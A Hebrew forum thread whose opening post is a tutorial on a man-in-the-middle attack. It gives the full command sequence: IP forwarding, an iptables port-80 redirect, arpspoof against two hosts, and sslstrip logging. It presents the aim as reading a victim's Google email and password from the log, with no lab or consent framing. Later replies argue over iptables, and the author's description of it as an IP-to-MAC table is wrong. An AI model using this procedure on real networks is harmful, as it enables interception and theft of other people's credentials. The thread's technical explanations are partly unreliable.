קהילות פורומים, הורדות, יעוץ ותמיכה


אשכולות דומים

  1. [פרסום] H1jackMyServer-פרק 3-מתקפות-חלק 3
    על ידי sapirshemer בפורום האקינג ואבטחת מידע
    תגובות: 24
    הודעה אחרונה: 20-11-2012, 09:29
  2. [פרסום] H1jackMyServer-פרק 3-מתקפות-חלק 1
    על ידי sapirshemer בפורום האקינג ואבטחת מידע
    תגובות: 7
    הודעה אחרונה: 16-07-2011, 01:26
  3. [פרסום] H1jackMyServer-פרק 2-פריצת רשתות-חלק 3
    על ידי sapirshemer בפורום האקינג ואבטחת מידע
    תגובות: 4
    הודעה אחרונה: 03-07-2011, 10:21
  4. [פרסום] H1jackMyServer-פרק 2-פריצת רשתות-חלק 2
    על ידי sapirshemer בפורום האקינג ואבטחת מידע
    תגובות: 9
    הודעה אחרונה: 03-07-2011, 00:15
  5. [פרסום] H1jackMyServer-פרק 2-פריצת רשתות-חלק 1
    על ידי sapirshemer בפורום האקינג ואבטחת מידע
    תגובות: 6
    הודעה אחרונה: 28-06-2011, 17:13
+ תגובה לנושא
מציג תוצאות 1 עד 14 מתוך 14

H1jackMyServer-פרק 3-חלק 2

  1. #1
    משתמש מתקדם
    שם פרטי
    ספיר
    תאריך הצטרפות
    03/2011
    גיל
    29
    הודעות
    532
    לייקים
    26
    נקודות
    -30
    משפט מחץ
    יש שני דברים אינסופים: היקום ואיבר המין שלי אבל אני לא בטוח לגבי הראשון XD
    מין: זכר

    ברירת מחדל H1jackMyServer-פרק 3-חלק 2

    פרק 3-מתקפות
    חלק 2-מתקפות-מתקפת האדם באמצע!
    שלום לכל הפורום היום אני ילמד אתכם מתקפה שאני ממש אוהב שנקראת man in the middle attack מתקפת האדם באמצע הקיצור של זה הוא mitm attack...
    בכללי מטרת המתקפה היא לגנוב מידע בין שני מחשבים זאת אומרת "להיכנס בינהם" שזה אומר להגיד למחשב הראשון שאנחנו השני ולשני שאנחנו הראשון.
    אז נתחיל,
    לפני שעושים את המתקפה צריך לשים את המחשב שלנו על forwarding mode(מצב שילוח).
    קודם נבדוק אם הוא עכשיו במצב שילוח, נרשום:
    קוד:
    cat /proc/sys/net/ipv4/ip_forward

    אם זה ירשום לנו 0 סימן שאנחנו לא על מצב שילוח ואנחנו צריכים לשנות את זה לאחד ע"י זה שנרשום:
    קוד:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    רשמתי echo שזה אומר להדפיס ואני רוצה להדפיס את הערך 1, הסימן < אומר להחליף את הערך הקיים בערך חדש(ע"י echo).
    עכשיו נבדוק אם זה עבד:

    קוד:
    cat /proc/sys/net/ipv4/ip_forward

    וזה אמור להדפיס לנו את המספר 1 על המסך.
    נמשיך,
    עכשיו נשחק קצת עם ה-iptables(טבלאות אייפי).
    נרשום:
    קוד:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

    עכשיו אני יסביר על הפקודה:
    -t = טבלת אייפי
    -A = הוספת חוק
    -p = פרוטוקול
    --destination-port = הפורט שעליו נעשה את המתקפה
    -j = לקפוץ(מה לעשות עם המידע שנשיג, לאן לשלוח אותו)
    --to-port = הפורט שאתם רוצים לעשות בו את ה- "REDIRECT".


    nat = טבלת אייפי
    PREROUTING = חוק
    tcp/udp = פרוטוקולים
    80 = הפורט שעושים עליו את המתקפה
    REDIRECT = לשלוח את המידע שנקבל ללוקלהוסט שלנו(המחשב שלנו) לפורט מסויים
    8080 = הפורט שעליו נשלח את המידע שנקבל מהמקפה כדי למנוע שאלות מטוטמות אפשר לרשום כל פורט במקום 8080 אבל בשלב מאוחר תצתרכו לזכור את הפורט הזה אז אל תחרבשו סתם פורט שאתם לא יודעים...
    ועכשיו כשעשינו את זה למתקפה,
    עכשיו מה שאנחנו צריכים לעשות זה להגיד למחשב 1 שאנחנו מחשב 2 ולמחשב 2 שאנחנו מחשב 1, ככה:
    קוד:
    arpspoof -i wlan0 -t IP1 IP2

    ועכשיו נסביר:

    -i = סוג החיבר שלנו לרשת(wlan0 או wifi0-רשת על חוטית eth0-רשת חוטית)
    -t = המחשב שעליו עושים את המתקפה ואחרי זה השרת שרוצים לקבל ממנו את המידע(ip1 ו ip2).
    עכשיו כשאמרנו לכל אחד שאנחנו השני אנחנו בבעיה, במקרה והוא יכנס לאתר https(Hyper Text Transfer Protocol Secured) אז אנחנו צריכים לבצעה את המתקפה על sslstrip
    אז עכשיו אנחנו נצרך להאזין בעזרת sslstrip כך:
    בקונסול חדש:
    קוד:
    cd /pentest/web/sslstrip

    ואז:
    קוד:
    python sslstrip.py -l 8080
    עכשיו הסבר:

    cd = לעבור למיקום מסויים.
    python = להריץ סקריפט שבנוי על שפת פייתון
    -l = הפורט שעליו המידע אמור להגיע
    8080 = הפורט שהחלטנו שעליו המידע יגיע(אם אתם לא זוכרים למה זה 8080 אז תתחילו לקרוא שוב אתם תשימו לך)



    עכשיו פותחים עוד קונסול כדי לבדוק איזה מידע הגיע עלינו,
    נרשום:
    קוד:
    cd /pentest/web/sslstrip
    ואז:
    קוד:
    more sslstrip.log
    כבר הסברתי מזה cd ו-more זה פשוט מה רשום בקובץ מסויים...
    בקיצור תעשו more sslstrip.log כל 5 דקות, יהיה קשה לקרוא את המידע אבל נגיד כשהקורבן יכנס למשתמש בגוגל זה יהיה משהו כזה:
    email=email;password=pass
    אבל יהיה קשה למצוא את השורה הזאת אבל עם הזמן מתרגלים ומתחילים למצוא מהר.
    זה היה מדיך ממש מפורט וממש השקעתי בו, תגובות בבקשה!
    המשך יום נעים
    תהנו
    כל הזכיות שמורות לי.
    נערך לאחרונה על ידי sapirshemer; 14-07-2011 בשעה 23:25.
    "the quieter you become, the more you are able to hear"
    פעיל בפורום:
    ~פיקאפ ואומנות הפיתוי~
    תחומים:
    מתמחה בשיטה של מיסטרי, בשיטה הטבעית של גמבלר, שפת גוף, בעל ידע בסיסי בNLP וניסיון בשטח.
    כל שאלה תתקבל בברכה

  2. קישורים ממומנים

  3. #2
    משתמש מתקדם
    שם פרטי
    חסוי
    תאריך הצטרפות
    10/2010
    הודעות
    885
    לייקים
    22
    נקודות
    -59
    משפט מחץ
    ):
    מין: זכר

    ברירת מחדל

    IPTABLES זה הFireWall של לינוקס.(לא טבלאות אייפי!!)

    מנהל אבטחת מידע לשעבר.

  4. #3
    משתמש מתקדם
    שם פרטי
    ספיר
    תאריך הצטרפות
    03/2011
    גיל
    29
    הודעות
    532
    לייקים
    26
    נקודות
    -30
    משפט מחץ
    יש שני דברים אינסופים: היקום ואיבר המין שלי אבל אני לא בטוח לגבי הראשון XD
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי Num32 צפיה בהודעה
    IPTABLES זה הFireWall של לינוקס.(לא טבלאות אייפי!!)
    לא נכון,
    iptables is a user space application program that allows a system administrator to configure the tables provided by the Linux kernel firewall (implemented as different Netfilter modules) and the chains and rules it stores.
    לעוד מידע על זה:
    http://en.wikipedia.org/wiki/Iptables


    נערך לאחרונה על ידי sapirshemer; 14-07-2011 בשעה 18:40.
    "the quieter you become, the more you are able to hear"
    פעיל בפורום:
    ~פיקאפ ואומנות הפיתוי~
    תחומים:
    מתמחה בשיטה של מיסטרי, בשיטה הטבעית של גמבלר, שפת גוף, בעל ידע בסיסי בNLP וניסיון בשטח.
    כל שאלה תתקבל בברכה

  5. #4
    מורחקים
    שם פרטי
    MaTaN
    תאריך הצטרפות
    03/2011
    הודעות
    898
    לייקים
    11
    נקודות
    5
    מין: זכר

    ברירת מחדל

    תודה רבה על המידע!

  6. #5
    משתמש מתקדם
    תאריך הצטרפות
    07/2011
    גיל
    35
    הודעות
    728
    לייקים
    21
    נקודות
    0
    מין: זכר

    ברירת מחדל

    מעתיקים ממך בפורום *** והוא אומר שהזכויות שמורות לו

  7. #6
    משתמש מתקדם
    שם פרטי
    ספיר
    תאריך הצטרפות
    03/2011
    גיל
    29
    הודעות
    532
    לייקים
    26
    נקודות
    -30
    משפט מחץ
    יש שני דברים אינסופים: היקום ואיבר המין שלי אבל אני לא בטוח לגבי הראשון XD
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי SlashxmE צפיה בהודעה
    מעתיקים ממך בפורום *** והוא אומר שהזכויות שמורות לו
    לא מעתיקים זה אני פרסמתי בפורום ***...אני FHack3r...
    נערך לאחרונה על ידי sapirshemer; 15-07-2011 בשעה 10:27.
    "the quieter you become, the more you are able to hear"
    פעיל בפורום:
    ~פיקאפ ואומנות הפיתוי~
    תחומים:
    מתמחה בשיטה של מיסטרי, בשיטה הטבעית של גמבלר, שפת גוף, בעל ידע בסיסי בNLP וניסיון בשטח.
    כל שאלה תתקבל בברכה

  8. #7
    משתמש מתקדם
    שם פרטי
    חסוי
    תאריך הצטרפות
    10/2010
    הודעות
    885
    לייקים
    22
    נקודות
    -59
    משפט מחץ
    ):
    מין: זכר

    מנהל אבטחת מידע לשעבר.

  9. #8
    משתמש מתקדם
    שם פרטי
    ספיר
    תאריך הצטרפות
    03/2011
    גיל
    29
    הודעות
    532
    לייקים
    26
    נקודות
    -30
    משפט מחץ
    יש שני דברים אינסופים: היקום ואיבר המין שלי אבל אני לא בטוח לגבי הראשון XD
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי Num32 צפיה בהודעה

    אתה בעצמך נותן לי מידע שאומר שאתה טועה,
    הפיירוול רק משתמש בזה זה לא אומר שזה הפיירוול
    iptables:
    IP | MAC
    X.X.X.X | XX:XX:XX:XX:XX:XX
    X.X.X.X | XX:XX:XX:XX:XX:XX
    X.X.X.X | XX:XX:XX:XX:XX:XX
    X.X.X.X | XX:XX:XX:XX:XX:XX

    וכו' הפיירוול משתמש בזה כדי לזהות את המחשבים ברשת,לחסום וכדומה...
    נערך לאחרונה על ידי sapirshemer; 15-07-2011 בשעה 12:40.
    "the quieter you become, the more you are able to hear"
    פעיל בפורום:
    ~פיקאפ ואומנות הפיתוי~
    תחומים:
    מתמחה בשיטה של מיסטרי, בשיטה הטבעית של גמבלר, שפת גוף, בעל ידע בסיסי בNLP וניסיון בשטח.
    כל שאלה תתקבל בברכה

  10. #9
    משתמש מתקדם
    שם פרטי
    ספיר
    תאריך הצטרפות
    03/2011
    גיל
    29
    הודעות
    532
    לייקים
    26
    נקודות
    -30
    משפט מחץ
    יש שני דברים אינסופים: היקום ואיבר המין שלי אבל אני לא בטוח לגבי הראשון XD
    מין: זכר

    ברירת מחדל

    תגובות בבקשה
    "the quieter you become, the more you are able to hear"
    פעיל בפורום:
    ~פיקאפ ואומנות הפיתוי~
    תחומים:
    מתמחה בשיטה של מיסטרי, בשיטה הטבעית של גמבלר, שפת גוף, בעל ידע בסיסי בNLP וניסיון בשטח.
    כל שאלה תתקבל בברכה

  11. #10
    משתמש מתקדם
    תאריך הצטרפות
    07/2011
    הודעות
    645
    לייקים
    34
    נקודות
    3
    משפט מחץ
    פעם אחת הופיעה פיה בלילה ואמרה לי תבחר משהו אחד, או זין גדול או זיכרון טוב אני כבר לא זוכר במה בחרתי..
    מין: זכר

    ברירת מחדל

    תודה רבה.


    HTML - xHTML - CSS - JavaScript - JQuery - PHP - SQL - OOP Programming - Photoshop

    מתכנת, מקודד, מקדם, כותב מאמרים ותוכן ומעצב אתרים.

  12. #11
    מורחקים
    שם פרטי
    דני
    תאריך הצטרפות
    04/2010
    הודעות
    5,199
    לייקים
    23
    נקודות
    4,763
    מין: זכר

    ברירת מחדל

    כל הכבוד!

    לללללללללינקיייייייייה

  13. #12
    משתמט כבוד
    שם פרטי
    אוֹרי
    תאריך הצטרפות
    02/2006
    הודעות
    21,037
    לייקים
    1421
    נקודות
    0
    משפט מחץ
    "אלוהים ברא אותי אתאיסט, מי אתם שתטילו ספק בחכמתו."
    מין: זכר

    ברירת מחדל

    iptables בלינוקס זה ה ACL (סוג של חומת אש נורא בסיסית) שם רשום מי מה מו למה ואיך יכול להיכנס למערכת
    לכן נועם צודק בטענה שלו

    מי מה מו למה איך =איזה אי פי באיזה פורט מאיזה אי פי ומאיזה פורט באיזה מצב
    %מי מה מו למה ואיך%==127.0.0.1:4573 מגיע מאיפי 127.0.0.1:80 דרך פרוטוקול tcp בישום html
    נערך לאחרונה על ידי Ori; 23-07-2011 בשעה 08:35.

  14. #13
    משתמש מתקדם
    שם פרטי
    חסוי
    תאריך הצטרפות
    10/2010
    הודעות
    885
    לייקים
    22
    נקודות
    -59
    משפט מחץ
    ):
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי Ori צפיה בהודעה
    iptables בלינוקס זה ה ACL (סוג של חומת אש נורא בסיסית) שם רשום מי מה מו למה ואיך יכול להיכנס למערכת
    לכן נועם צודק בטענה שלו

    מי מה מו למה איך =איזה אי פי באיזה פורט מאיזה אי פי ומאיזה פורט באיזה מצב
    %מי מה מו למה ואיך%==127.0.0.1:4573 מגיע מאיפי 127.0.0.1:80 דרך פרוטוקול tcp בישום html
    לא קוראים לי נועם - קוראים לי בניה :פ

    מנהל אבטחת מידע לשעבר.

  15. #14
    משתמט כבוד
    שם פרטי
    אוֹרי
    תאריך הצטרפות
    02/2006
    הודעות
    21,037
    לייקים
    1421
    נקודות
    0
    משפט מחץ
    "אלוהים ברא אותי אתאיסט, מי אתם שתטילו ספק בחכמתו."
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי Num32 צפיה בהודעה
    לא קוראים לי נועם - קוראים לי בניה :פ
    הנחתי שיש לך טעות בניק וזה צריך להיות נועם, אוקי אז בניה צודק

+ תגובה לנושא


הרשאות פרסום

  • אין באפשרותך לפרסם נושאים חדשים
  • אין באפשרותך לפרסם תגובות
  • אין באפשרותך לצרף קבצים
  • אין באפשרותך לערוך את הודעותיך


כל הזמנים הם לפי GMT +3. השעה כרגע היא 10:06.
מופעל על ידי vBulletin™ © גרסה 4.1, 2011 vBulletin Solutions, Inc. כל הזכויות שמורות.
פעילות הגולשים
אומנות וגרפיקה
מוזיקה
ספורט
סדרות טלוויזיה
סרטים וקולנוע
קנייה ומכירה
רשתות חברתיות
הבורר 3
פורומי פנאי ובידור
סרטים
סדרות
משחקים
דיבורים
אקטואליה
בעלי חיים
בדיחות והומור
משחקי ספורט
הבורר
מחשבים וטכנולוגיה
תמיכה טכנית
חומרה ומודינג
תוכנות להורדה
סלולארי וגאדג'טים
רקעים למחשב
ציוד הקפי למחשב
אבטחת מידע
תכנות ובניית אתרים
כסף ברשת
אייפון
בריאות ואורח חיים
כושר ופיתוח גוף
דיאטה
צבא וגיוס
יעוץ מיני
מה שבלב
אומנות הפיתוי
יהדות
מיסטיקה ורוחניות
אתאיזם ודתות

נושאים: 2,450,607 | הודעות: 8,151,189 | משתמשים: 315,603 | המשתמש החדש ביותר: upizijoj | עיצוב גרפי: סטודיו עודד בביוף | קידוד: rellect